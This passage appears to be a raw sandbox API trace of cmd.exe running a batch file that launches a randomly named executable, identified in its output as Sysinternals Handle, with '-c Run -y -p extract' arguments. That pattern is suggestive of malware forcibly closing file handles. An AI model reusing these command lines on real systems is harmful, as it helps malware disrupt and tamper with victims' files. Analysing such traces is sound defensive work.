lpNumberOfCharsWritten=0xcdf4cc, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf4cc*=0x26) returned 1 [0287.958] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xcdf4ec | out: _Buffer=") ") returned 2 [0287.958] _get_osfhandle (_FileHandle=1) returned 0x3c [0287.958] GetFileType (hFile=0x3c) returned 0x2 [0287.958] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0287.958] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf4c4 | out: lpMode=0xcdf4c4) returned 1 [0288.498] _get_osfhandle (_FileHandle=1) returned 0x3c [0288.498] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcdf4dc, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf4dc*=0x2) returned 1 [0288.653] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xcdf500 | out: _Buffer="\r\n") returned 2 [0288.653] _get_osfhandle (_FileHandle=1) returned 0x3c [0288.653] GetFileType (hFile=0x3c) returned 0x2 [0288.653] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0288.653] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf4d8 | out: lpMode=0xcdf4d8) returned 1 [0289.779] _get_osfhandle (_FileHandle=1) returned 0x3c [0289.779] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcdf4f0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf4f0*=0x2) returned 1 [0290.059] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0290.059] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0290.059] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0290.060] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0290.060] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0290.060] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0290.060] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0290.060] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0xcdf428, _Radix=0 | out: _EndPtr=0xcdf428*=",6 delims=: \"") returned 3 [0290.060] wcstol (in: _String="6 delims=: \"", _EndPtr=0xcdf428, _Radix=0 | out: _EndPtr=0xcdf428*=" delims=: \"") returned 6 [0290.060] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0290.060] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0290.060] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0290.060] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0290.060] _wpopen (_Command="vIDhS3md.exe -accepteula \"Workflow.Targets\" -nobanner", _Mode="rb") returned 0x77981268 [0290.070] feof (_File=0x77981268) returned 0 [0290.070] ferror (_File=0x77981268) returned 0 [0290.070] fgets (in: _Buf=0xeccb98, _MaxCount=256, _File=0x77981268 | out: _Buf="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n", _File=0x77981268) returned="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n" [0291.594] feof (_File=0x77981268) returned 0 [0291.594] ferror (_File=0x77981268) returned 0 [0291.594] fgets (in: _Buf=0xeca6a6, _MaxCount=442, _File=0x77981268 | out: _Buf="\r\r\n", _File=0x77981268) returned="\r\r\n" [0291.594] feof (_File=0x77981268) returned 0 [0291.594] ferror (_File=0x77981268) returned 0 [0291.594] fgets (in: _Buf=0xecbed1, _MaxCount=695, _File=0x77981268 | out: _Buf="", _File=0x77981268) returned 0x0 [0292.846] _pclose (in: _File=0x77981268 | out: _File=0x77981268) returned 1 [0292.847] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xecbed1, cbMultiByte=73, lpWideCharStr=0xecbe88, cchWideChar=73 | out: lpWideCharStr="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n\r\r\n") returned 73 [0292.847] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xcdf108 | out: _Buffer="\r\n") returned 2 [0292.847] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.847] GetFileType (hFile=0x3c) returned 0x2 [0292.847] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0292.847] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf0e0 | out: lpMode=0xcdf0e0) returned 1 [0292.907] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.907] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcdf0f8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf0f8*=0x2) returned 1 [0292.907] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0292.907] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xcdf104 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0292.907] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xcdf104 | out: _Buffer=">") returned 1 [0292.907] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.907] GetFileType (hFile=0x3c) returned 0x2 [0292.907] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0292.907] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf0e4 | out: lpMode=0xcdf0e4) returned 1 [0292.907] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.907] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xcdf0fc, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xcdf0fc*=0x1e) returned 1 [0292.908] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.908] GetFileType (hFile=0x3c) returned 0x2 [0292.908] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0292.908] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf384 | out: lpMode=0xcdf384) returned 1 [0292.908] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.908] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13d2318*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xcdf39c, lpReserved=0x0 | out: lpBuffer=0x13d2318*, lpNumberOfCharsWritten=0xcdf39c*=0x1) returned 1 [0292.908] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.908] GetFileType (hFile=0x3c) returned 0x2 [0292.908] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0292.908] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf374 | out: lpMode=0xcdf374) returned 1 [0292.908] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.908] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xed87d0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0xcdf38c, lpReserved=0x0 | out: lpBuffer=0xed87d0*, lpNumberOfCharsWritten=0xcdf38c*=0xc) returned 1 [0292.909] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xcdf394 | out: _Buffer=" -accepteula -c Run -y -p extract -nobanner ") returned 44 [0292.909] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.909] GetFileType (hFile=0x3c) returned 0x2 [0292.909] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0292.909] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf36c | out: lpMode=0xcdf36c) returned 1 [0292.909] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.909] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xcdf384, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf384*=0x2c) returned 1 [0292.909] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xcdf3a4 | out: _Buffer=") ") returned 2 [0292.909] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.909] GetFileType (hFile=0x3c) returned 0x2 [0292.909] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0292.909] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf37c | out: lpMode=0xcdf37c) returned 1 [0292.910] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.910] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcdf394, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf394*=0x2) returned 1 [0292.910] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xcdf3b8 | out: _Buffer="\r\n") returned 2 [0292.910] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.910] GetFileType (hFile=0x3c) returned 0x2 [0292.910] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0292.910] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf390 | out: lpMode=0xcdf390) returned 1 [0292.910] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.910] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcdf3a8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf3a8*=0x2) returned 1 [0292.910] GetConsoleTitleW (in: lpConsoleTitle=0xcdeed0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0292.911] GetFileAttributesW (lpFileName="vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x20 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0292.911] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="FOR") returned 16 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="IF") returned 13 [0292.912] _wcsicmp (_String1="vIDhS3md.exe", _String2="REM") returned 4 [0292.913] _wcsnicmp (_String1="vIDh", _String2="cmd ", _MaxCount=0x4) returned 19 [0292.913] SetErrorMode (uMode=0x0) returned 0x0 [0292.913] SetErrorMode (uMode=0x1) returned 0x0 [0292.913] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xecbf30, lpFilePart=0xcde9dc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xcde9dc*="Desktop") returned 0x1d [0292.913] SetErrorMode (uMode=0x0) returned 0x1 [0292.913] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0292.913] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0292.913] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0292.913] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0292.913] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", fInfoLevelId=0x1, lpFindFileData=0xcde788, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcde788) returned 0xeccc10 [0292.913] FindClose (in: hFindFile=0xeccc10 | out: hFindFile=0xeccc10) returned 1 [0292.913] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0292.913] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0292.913] GetConsoleTitleW (in: lpConsoleTitle=0xcdec5c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0292.914] InitializeProcThreadAttributeList (in: lpAttributeList=0xcdeb88, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xcdeb6c | out: lpAttributeList=0xcdeb88, lpSize=0xcdeb6c) returned 1 [0292.914] UpdateProcThreadAttribute (in: lpAttributeList=0xcdeb88, dwFlags=0x0, Attribute=0x60001, lpValue=0xcdeb74, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xcdeb88, lpPreviousValue=0x0) returned 1 [0292.914] GetStartupInfoW (in: lpStartupInfo=0xcdebc0 | out: lpStartupInfo=0xcdebc0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0292.914] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0292.914] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0292.914] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0292.914] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0292.914] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0292.914] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0292.914] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0292.914] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0292.914] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0292.914] _wcsnicmp (_String1="COPYCMD", _String2="FN=\"Wor", _MaxCount=0x7) returned -3 [0292.914] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0292.914] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0292.914] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0292.914] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0292.914] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0292.914] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0292.914] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0292.914] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0292.914] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0292.915] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0292.915] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0292.915] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0292.915] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0292.915] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0292.915] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0292.915] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0292.915] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0292.915] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0292.915] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0292.915] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0292.915] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0292.915] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0292.915] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0292.915] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0292.915] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0292.915] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0292.915] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0292.915] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0292.915] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0292.915] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0292.915] lstrcmpW (lpString1="\\vIDhS3md.exe", lpString2="\\XCOPY.EXE") returned -1 [0292.915] CreateProcessW (in: lpApplicationName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", lpCommandLine="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xcdeb10*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xcdeb5c | out: lpCommandLine="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0xcdeb5c*(hProcess=0xb8, hThread=0xcc, dwProcessId=0xd14, dwThreadId=0x9e4)) returned 1 [0292.922] CloseHandle (hObject=0xcc) returned 1 [0292.922] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0292.922] GetEnvironmentStringsW () returned 0xecce18* [0292.922] FreeEnvironmentStringsA (penv="=") returned 1 [0292.922] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0296.889] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0xcdeaf4 | out: lpExitCode=0xcdeaf4*=0x0) returned 1 [0296.889] CloseHandle (hObject=0xb8) returned 1 [0296.889] _vsnwprintf (in: _Buffer=0xcdebdc, _BufferCount=0x13, _Format="%08X", _ArgList=0xcdeafc | out: _Buffer="00000000") returned 8 [0296.889] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0296.889] GetEnvironmentStringsW () returned 0xecce18* [0296.889] FreeEnvironmentStringsA (penv="=") returned 1 [0296.890] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0296.890] GetEnvironmentStringsW () returned 0xecce18* [0296.890] FreeEnvironmentStringsA (penv="=") returned 1 [0296.890] DeleteProcThreadAttributeList (in: lpAttributeList=0xcdeb88 | out: lpAttributeList=0xcdeb88) [0296.890] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.890] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0296.956] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.956] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0296.956] _get_osfhandle (_FileHandle=0) returned 0x38 [0296.956] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0296.956] SetConsoleInputExeNameW () returned 0x1 [0296.956] GetConsoleOutputCP () returned 0x1b5 [0296.956] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0296.956] SetThreadUILanguage (LangId=0x0) returned 0x409 [0296.957] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xcdf4bc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0296.957] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0296.957] _get_osfhandle (_FileHandle=3) returned 0xb8 [0296.957] SetFilePointer (in: hFile=0xb8, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0296.958] _get_osfhandle (_FileHandle=3) returned 0xb8 [0296.958] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0296.958] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xcdf48c, lpOverlapped=0x0 | out: 